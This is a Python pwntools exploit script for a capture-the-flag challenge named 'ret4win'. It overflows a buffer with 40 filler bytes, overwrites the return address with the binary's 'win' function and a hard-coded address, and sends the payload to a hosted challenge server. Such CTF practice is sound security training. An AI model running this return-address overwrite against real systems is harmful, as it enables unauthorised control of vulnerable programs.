Ret4win
#!/usr/bin/env python3
from pwn import *
# Pin the LOCAL switch off: conn() will always take the remote branch, even
# when LOCAL is supplied on the command line. Remove this line to let the
# command-line switch select the local binary instead.
args.LOCAL = False

# Path to a local copy of the challenge binary.
LocalBin = "/Buckeye/PWN/ret4win/chall"

# Parse the local binary so its symbols can be looked up by name.
exe = ELF(LocalBin)

# ROP helper built over the same binary; it is not referenced again in the
# visible part of this script.
ropex = ROP(exe)
def conn():
    """Return a pwntools tube to the target.

    Spawns the local binary at ``LocalBin`` when ``args.LOCAL`` is truthy;
    otherwise opens a TCP connection to the hosted challenge service.
    """
    if not args.LOCAL:
        return remote("pwn.chall.pwnoh.io", 13379)
    return process(LocalBin)
# Open the tube selected by conn().
r = conn()

# 40 filler bytes; presumably the distance from the start of the input buffer
# to the saved return address in this build -- confirm against the binary.
OFFSET = b'A' * 40

# Address of the binary's `win` symbol, packed as a 64-bit value.
WIN = p64(exe.symbols['win'])

# A second, hard-coded address follows `win`; what it points to is not shown
# on this page, and it only holds for this exact build of the binary.
payload = b''.join([OFFSET, WIN, p64(0x401245)])

# Wait for the service's "**beep**" prompt, then send the payload and a newline.
r.sendlineafter(b'**beep**', payload)

# Hand the connection over to the terminal.
r.interactive()